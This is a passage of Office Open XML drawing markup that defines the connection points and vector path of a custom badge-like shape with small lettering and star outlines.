                <a:gd name="connsiteX548" fmla="*/ 107043 w 476571"/>
                <a:gd name="connsiteY548" fmla="*/ 301402 h 430935"/>
                <a:gd name="connsiteX549" fmla="*/ 369654 w 476571"/>
                <a:gd name="connsiteY549" fmla="*/ 301714 h 430935"/>
                <a:gd name="connsiteX550" fmla="*/ 378300 w 476571"/>
                <a:gd name="connsiteY550" fmla="*/ 271754 h 430935"/>
                <a:gd name="connsiteX551" fmla="*/ 388356 w 476571"/>
                <a:gd name="connsiteY551" fmla="*/ 15775 h 430935"/>
                <a:gd name="connsiteX552" fmla="*/ 76938 w 476571"/>
                <a:gd name="connsiteY552" fmla="*/ 0 h 430935"/>
                <a:gd name="connsiteX553" fmla="*/ 238615 w 476571"/>
                <a:gd name="connsiteY553" fmla="*/ 1341 h 430935"/>
                <a:gd name="connsiteX554" fmla="*/ 400228 w 476571"/>
                <a:gd name="connsiteY554" fmla="*/ 0 h 430935"/>
                <a:gd name="connsiteX555" fmla="*/ 389421 w 476571"/>
                <a:gd name="connsiteY555" fmla="*/ 276774 h 430935"/>
                <a:gd name="connsiteX556" fmla="*/ 381714 w 476571"/>
                <a:gd name="connsiteY556" fmla="*/ 304644 h 430935"/>
                <a:gd name="connsiteX557" fmla="*/ 400980 w 476571"/>
                <a:gd name="connsiteY557" fmla="*/ 309819 h 430935"/>
                <a:gd name="connsiteX558" fmla="*/ 398349 w 476571"/>
                <a:gd name="connsiteY558" fmla="*/ 320450 h 430935"/>
                <a:gd name="connsiteX559" fmla="*/ 441705 w 476571"/>
                <a:gd name="connsiteY559" fmla="*/ 320450 h 430935"/>
                <a:gd name="connsiteX560" fmla="*/ 441705 w 476571"/>
                <a:gd name="connsiteY560" fmla="*/ 338127 h 430935"/>
                <a:gd name="connsiteX561" fmla="*/ 476571 w 476571"/>
                <a:gd name="connsiteY561" fmla="*/ 338127 h 430935"/>
                <a:gd name="connsiteX562" fmla="*/ 463258 w 476571"/>
                <a:gd name="connsiteY562" fmla="*/ 363067 h 430935"/>
                <a:gd name="connsiteX563" fmla="*/ 476446 w 476571"/>
                <a:gd name="connsiteY563" fmla="*/ 388007 h 430935"/>
                <a:gd name="connsiteX564" fmla="*/ 392303 w 476571"/>
                <a:gd name="connsiteY564" fmla="*/ 388007 h 430935"/>
                <a:gd name="connsiteX565" fmla="*/ 392303 w 476571"/>
                <a:gd name="connsiteY565" fmla="*/ 370362 h 430935"/>
                <a:gd name="connsiteX566" fmla="*/ 337262 w 476571"/>
                <a:gd name="connsiteY566" fmla="*/ 370362 h 430935"/>
                <a:gd name="connsiteX567" fmla="*/ 238489 w 476571"/>
                <a:gd name="connsiteY567" fmla="*/ 430935 h 430935"/>
                <a:gd name="connsiteX568" fmla="*/ 140218 w 476571"/>
                <a:gd name="connsiteY568" fmla="*/ 370362 h 430935"/>
                <a:gd name="connsiteX569" fmla="*/ 84143 w 476571"/>
                <a:gd name="connsiteY569" fmla="*/ 370362 h 430935"/>
                <a:gd name="connsiteX570" fmla="*/ 84143 w 476571"/>
                <a:gd name="connsiteY570" fmla="*/ 388007 h 430935"/>
                <a:gd name="connsiteX571" fmla="*/ 0 w 476571"/>
                <a:gd name="connsiteY571" fmla="*/ 388007 h 430935"/>
                <a:gd name="connsiteX572" fmla="*/ 13220 w 476571"/>
                <a:gd name="connsiteY572" fmla="*/ 363067 h 430935"/>
                <a:gd name="connsiteX573" fmla="*/ 0 w 476571"/>
                <a:gd name="connsiteY573" fmla="*/ 338127 h 430935"/>
                <a:gd name="connsiteX574" fmla="*/ 34898 w 476571"/>
                <a:gd name="connsiteY574" fmla="*/ 338127 h 430935"/>
                <a:gd name="connsiteX575" fmla="*/ 34898 w 476571"/>
                <a:gd name="connsiteY575" fmla="*/ 320450 h 430935"/>
                <a:gd name="connsiteX576" fmla="*/ 76687 w 476571"/>
                <a:gd name="connsiteY576" fmla="*/ 320450 h 430935"/>
                <a:gd name="connsiteX577" fmla="*/ 74056 w 476571"/>
                <a:gd name="connsiteY577" fmla="*/ 309819 h 430935"/>
                <a:gd name="connsiteX578" fmla="*/ 95264 w 476571"/>
                <a:gd name="connsiteY578" fmla="*/ 304177 h 430935"/>
                <a:gd name="connsiteX579" fmla="*/ 87714 w 476571"/>
                <a:gd name="connsiteY579" fmla="*/ 276743 h 430935"/>
                <a:gd name="connsiteX580" fmla="*/ 76938 w 476571"/>
                <a:gd name="connsiteY580" fmla="*/ 0 h 430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</a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="476571" h="430935">
                  <a:moveTo>
                    <a:pt x="237573" y="338306"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="216796" y="338306"/>
                    <a:pt x="195838" y="339233"/>
                    <a:pt x="181287" y="341088"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="160330" y="343582"/>
                    <a:pt x="149334" y="346170"/>
                    <a:pt x="139278" y="350441"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="181131" y="395115"/>
                    <a:pt x="238270" y="414287"/>
                    <a:pt x="238270" y="414287"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="238270" y="414287"/>
                    <a:pt x="294783" y="395925"/>
                    <a:pt x="336636" y="351813"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="322572" y="346278"/>
                    <a:pt x="307818" y="342670"/>
                    <a:pt x="292778" y="341088"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="278948" y="339233"/>
                    <a:pt x="258350" y="338306"/>
                    <a:pt x="237573" y="338306"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="229749" y="303709"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="234260" y="303709"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="240557" y="303709"/>
                    <a:pt x="242562" y="307388"/>
                    <a:pt x="242562" y="313155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="242562" y="319485"/>
                    <a:pt x="239053" y="321729"/>
                    <a:pt x="235388" y="321729"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="229749" y="321729"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="223452" y="298409"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="223452" y="327028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="235983" y="327028"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="244755" y="327028"/>
                    <a:pt x="249047" y="320855"/>
                    <a:pt x="249047" y="312563"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="249047" y="303054"/>
                    <a:pt x="243439" y="298409"/>
                    <a:pt x="235983" y="298409"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="275142" y="298316"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="268876" y="317987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="262172" y="298409"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="253275" y="298409"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="253275" y="327028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="259228" y="327028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="259228" y="306951"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="266276" y="327028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="271194" y="327028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="278211" y="306764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="278305" y="306764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="278305" y="326934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="284038" y="326934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="284038" y="298316"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="206755" y="297723"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="197859" y="297723"/>
                    <a:pt x="192627" y="304582"/>
                    <a:pt x="192627" y="312843"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="192627" y="321105"/>
                    <a:pt x="197859" y="327714"/>
                    <a:pt x="206755" y="327714"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="213463" y="327906"/>
                    <a:pt x="219065" y="322666"/>
                    <a:pt x="219286" y="315992"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="213021" y="315992"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="212986" y="319561"/>
                    <a:pt x="210060" y="322431"/>
                    <a:pt x="206474" y="322414"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="200804" y="322414"/>
                    <a:pt x="198955" y="317862"/>
                    <a:pt x="198955" y="312843"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="198955" y="307824"/>
                    <a:pt x="201085" y="303023"/>
                    <a:pt x="206755" y="303023"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="209790" y="302965"/>
                    <a:pt x="212429" y="305080"/>
                    <a:pt x="213021" y="308043"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="219286" y="308043"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="218595" y="301800"/>
                    <a:pt x="213047" y="297231"/>
                    <a:pt x="206755" y="297723"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="312420" y="297567"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="307502" y="307544"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="296412" y="309133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="304432" y="316896"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="302552" y="327870"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="312420" y="322695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="322319" y="327870"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="320440" y="316896"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="328428" y="309133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317370" y="307544"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="164151" y="297567"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="159202" y="307544"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="148143" y="309133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="156132" y="316896"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154252" y="327870"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164151" y="322695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="174051" y="327870"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="172296" y="316896"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180222" y="309133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="169164" y="307544"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="207288" y="238521"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="204391" y="238751"/>
                    <a:pt x="202171" y="241179"/>
                    <a:pt x="202213" y="244071"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="212269" y="244071"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="212049" y="241109"/>
                    <a:pt x="210420" y="238521"/>
                    <a:pt x="207288" y="238521"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="280905" y="236931"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="283474" y="236931"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289144" y="250368"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="294188" y="236931"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="296663" y="236931"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290178" y="253797"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="288863" y="257164"/>
                    <a:pt x="287327" y="258380"/>
                    <a:pt x="284978" y="258380"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="283820" y="258389"/>
                    <a:pt x="282679" y="258111"/>
                    <a:pt x="281657" y="257570"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="282440" y="255637"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="283186" y="256052"/>
                    <a:pt x="284030" y="256256"/>
                    <a:pt x="284884" y="256229"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="286199" y="256229"/>
                    <a:pt x="287077" y="255388"/>
                    <a:pt x="288017" y="253112"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="234135" y="236931"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="236484" y="236931"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236484" y="246471"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="236484" y="249495"/>
                    <a:pt x="238051" y="251366"/>
                    <a:pt x="240807" y="251366"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="240927" y="251365"/>
                    <a:pt x="241047" y="251360"/>
                    <a:pt x="241167" y="251351"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="243771" y="251144"/>
                    <a:pt x="245714" y="248876"/>
                    <a:pt x="245506" y="246284"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="245506" y="236931"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="247793" y="236931"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="247793" y="253143"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="245506" y="253143"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="245506" y="250306"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="244449" y="252262"/>
                    <a:pt x="242381" y="253466"/>
                    <a:pt x="240149" y="253423"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="239875" y="253431"/>
                    <a:pt x="239600" y="253419"/>
                    <a:pt x="239327" y="253389"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="236095" y="253026"/>
                    <a:pt x="233770" y="250124"/>
                    <a:pt x="234135" y="246908"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="263989" y="236838"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="266307" y="236838"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="266307" y="253081"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="263989" y="253081"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="225019" y="236682"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="227445" y="236634"/>
                    <a:pt x="229757" y="237705"/>
                    <a:pt x="231284" y="239581"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="229749" y="241265"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="228614" y="239775"/>
                    <a:pt x="226865" y="238871"/>
                    <a:pt x="224988" y="238802"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="224981" y="238802"/>
                    <a:pt x="224974" y="238803"/>
                    <a:pt x="224967" y="238803"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="221703" y="238998"/>
                    <a:pt x="219216" y="241789"/>
                    <a:pt x="219411" y="245037"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="219410" y="245072"/>
                    <a:pt x="219408" y="245108"/>
                    <a:pt x="219407" y="245143"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="219290" y="248412"/>
                    <a:pt x="221859" y="251156"/>
                    <a:pt x="225144" y="251272"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="226953" y="251230"/>
                    <a:pt x="228655" y="250411"/>
                    <a:pt x="229812" y="249028"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="231284" y="250462"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="229789" y="252405"/>
                    <a:pt x="227478" y="253555"/>
                    <a:pt x="225019" y="253579"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="224996" y="253579"/>
                    <a:pt x="224973" y="253578"/>
                    <a:pt x="224950" y="253577"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="220419" y="253439"/>
                    <a:pt x="216860" y="249671"/>
                    <a:pt x="216999" y="245162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="216999" y="245139"/>
                    <a:pt x="216998" y="245115"/>
                    <a:pt x="216997" y="245092"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="216879" y="240565"/>
                    <a:pt x="220470" y="236800"/>
                    <a:pt x="225019" y="236682"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="261075" y="236558"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="261075" y="239176"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="260888" y="239176"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="257410" y="239176"/>
                    <a:pt x="254622" y="241701"/>
                    <a:pt x="254622" y="246596"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="254622" y="253174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="252273" y="253174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="252273" y="236931"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="254622" y="236931"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="254622" y="241078"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="255551" y="238331"/>
                    <a:pt x="258163" y="236501"/>
                    <a:pt x="261075" y="236558"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="207351" y="236495"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="211987" y="236495"/>
                    <a:pt x="214650" y="240329"/>
                    <a:pt x="214744" y="245006"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="214760" y="245266"/>
                    <a:pt x="214760" y="245526"/>
                    <a:pt x="214744" y="245785"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="202213" y="245785"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="202230" y="248809"/>
                    <a:pt x="204689" y="251255"/>
                    <a:pt x="207727" y="251272"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="209628" y="251296"/>
                    <a:pt x="211437" y="250459"/>
                    <a:pt x="212645" y="248997"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="214086" y="250337"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="212466" y="252387"/>
                    <a:pt x="209939" y="253516"/>
                    <a:pt x="207323" y="253359"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="202920" y="253094"/>
                    <a:pt x="199566" y="249326"/>
                    <a:pt x="199832" y="244944"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="199828" y="244882"/>
                    <a:pt x="199824" y="244820"/>
                    <a:pt x="199821" y="244758"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="199607" y="240407"/>
                    <a:pt x="202978" y="236707"/>
                    <a:pt x="207351" y="236495"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="271821" y="231944"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="274139" y="231944"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="274139" y="236931"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="279120" y="236931"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="279120" y="239114"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="274139" y="239114"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="274139" y="248467"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="274104" y="248689"/>
                    <a:pt x="274101" y="248916"/>
                    <a:pt x="274131" y="249139"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="274302" y="250419"/>
                    <a:pt x="275484" y="251318"/>
                    <a:pt x="276770" y="251148"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="277567" y="251148"/>
                    <a:pt x="278352" y="250955"/>
                    <a:pt x="279057" y="250586"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="279057" y="252675"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="278190" y="253136"/>
                    <a:pt x="277221" y="253371"/>
                    <a:pt x="276238" y="253361"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="275927" y="253390"/>
                    <a:pt x="275614" y="253384"/>
                    <a:pt x="275305" y="253342"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="273077" y="253039"/>
                    <a:pt x="271517" y="250996"/>
                    <a:pt x="271821" y="248779"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="271821" y="239083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="269628" y="239083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="269628" y="236931"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="271821" y="236931"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="188993" y="230696"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="191794" y="230632"/>
                    <a:pt x="194510" y="231648"/>
                    <a:pt x="196574" y="233533"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="195196" y="235466"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="193494" y="233896"/>
                    <a:pt x="191251" y="233037"/>
                    <a:pt x="188931" y="233066"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="186174" y="233066"/>
                    <a:pt x="184420" y="234656"/>
                    <a:pt x="184420" y="236620"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="184420" y="238708"/>
                    <a:pt x="185516" y="239862"/>
                    <a:pt x="190184" y="240891"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="194914" y="241951"/>
                    <a:pt x="197075" y="243759"/>
                    <a:pt x="197075" y="247063"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="197071" y="247278"/>
                    <a:pt x="197055" y="247492"/>
                    <a:pt x="197029" y="247705"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="196596" y="251225"/>
                    <a:pt x="193376" y="253730"/>
                    <a:pt x="189839" y="253298"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="186601" y="253314"/>
                    <a:pt x="183490" y="252047"/>
                    <a:pt x="181193" y="249776"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="182665" y="247968"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="184549" y="249964"/>
                    <a:pt x="187181" y="251093"/>
                    <a:pt x="189933" y="251085"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="192784" y="251085"/>
                    <a:pt x="194663" y="249526"/>
                    <a:pt x="194663" y="247344"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="194663" y="245318"/>
                    <a:pt x="194005" y="244164"/>
                    <a:pt x="189150" y="243167"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="184294" y="242169"/>
                    <a:pt x="182039" y="240548"/>
                    <a:pt x="182039" y="236931"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="182037" y="236690"/>
                    <a:pt x="182050" y="236448"/>
                    <a:pt x="182077" y="236208"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="182457" y="232785"/>
                    <a:pt x="185554" y="230318"/>
                    <a:pt x="188993" y="230696"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="263832" y="230634"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="266495" y="230634"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="266495" y="233315"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="263832" y="233315"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="294846" y="207377"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="291932" y="207377"/>
                    <a:pt x="290303" y="208687"/>
                    <a:pt x="290303" y="210713"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="290306" y="210738"/>
                    <a:pt x="290309" y="210763"/>
                    <a:pt x="290312" y="210788"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="290546" y="212702"/>
                    <a:pt x="292296" y="214064"/>
                    <a:pt x="294219" y="213831"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="294273" y="213836"/>
                    <a:pt x="294326" y="213841"/>
                    <a:pt x="294380" y="213844"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="297003" y="214021"/>
                    <a:pt x="299274" y="212046"/>
                    <a:pt x="299451" y="209435"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="299451" y="208064"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="297959" y="207608"/>
                    <a:pt x="296407" y="207376"/>
                    <a:pt x="294846" y="207377"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="331560" y="201142"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="331525" y="201144"/>
                    <a:pt x="331489" y="201145"/>
                    <a:pt x="331454" y="201147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="328172" y="201321"/>
                    <a:pt x="325653" y="204111"/>
                    <a:pt x="325828" y="207377"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="325826" y="207412"/>
                    <a:pt x="325825" y="207446"/>
                    <a:pt x="325824" y="207481"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="325723" y="210768"/>
                    <a:pt x="328320" y="213513"/>
                    <a:pt x="331623" y="213613"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="331701" y="213611"/>
                    <a:pt x="331778" y="213608"/>
                    <a:pt x="331856" y="213603"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="335102" y="213395"/>
                    <a:pt x="337564" y="210608"/>
                    <a:pt x="337356" y="207377"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="337462" y="204072"/>
                    <a:pt x="334880" y="201294"/>
                    <a:pt x="331560" y="201142"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="176556" y="201080"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="173263" y="201248"/>
                    <a:pt x="170727" y="204037"/>
                    <a:pt x="170886" y="207315"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="170885" y="207331"/>
                    <a:pt x="170885" y="207346"/>
                    <a:pt x="170884" y="207361"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="170733" y="210629"/>
                    <a:pt x="173273" y="213400"/>
                    <a:pt x="176556" y="213550"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="176714" y="213547"/>
                    <a:pt x="176871" y="213537"/>
                    <a:pt x="177028" y="213520"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="180142" y="213192"/>
                    <a:pt x="182400" y="210414"/>
                    <a:pt x="182070" y="207315"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="182076" y="207245"/>
                    <a:pt x="182080" y="207174"/>
                    <a:pt x="182084" y="207103"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="182228" y="203921"/>
                    <a:pt x="179754" y="201224"/>
                    <a:pt x="176556" y="201080"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="227368" y="201018"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="224087" y="201202"/>
                    <a:pt x="221569" y="203986"/>
                    <a:pt x="221729" y="207253"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
